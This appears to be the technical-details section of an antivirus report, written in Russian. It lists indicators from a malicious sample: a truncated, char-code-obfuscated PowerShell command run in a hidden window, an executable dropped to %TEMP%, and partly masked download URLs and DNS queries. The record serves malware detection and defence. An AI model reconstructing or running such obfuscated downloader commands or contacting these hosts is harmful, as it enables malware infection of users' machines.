Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [STrINg]::JOIn('',([Char[]] (112,21 , 56,21 ,38 ,23 , 13 ,116, 105,116 ,58,49, 35,121,59 , 54,62 ,49 ,55 , 32 , 116,38,53,58, 48 ,59 ,57 , 111, 112 , 14 , 56,63 ,37,57 ,29 ,116, 105,116 , 58 ,4...
- %TEMP%\42643.exe
- %TEMP%\42643.exe
- http://sc#######dssalon-surrender.nl/hhBqx6/
- http://va##nka.com/iTKS/
- http://su####-smiles.com/
- http://www.an###ybodrov.ru/aB2aK/
- DNS ASK sc#######dssalon-surrender.nl
- DNS ASK va##nka.com
- DNS ASK su####-smiles.com
- DNS ASK an###ybodrov.ru
- DNS ASK do######smakyedekparca.com
- DNS ASK ke####amulia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [STrINg]::JOIn('',([Char[]] (112,21 , 56,21 ,38 ,23 , 13 ,116, 105,116 ,58,49, 35,121,59 , 54,62 ,49 ,55 , 32 , 116,38,53,58, 48 ,59 ,57 , 111, 112 , 14 , 56,63 ,37,57 ,29 ,116, 105,116 , 58 ,4...' (со скрытым окном)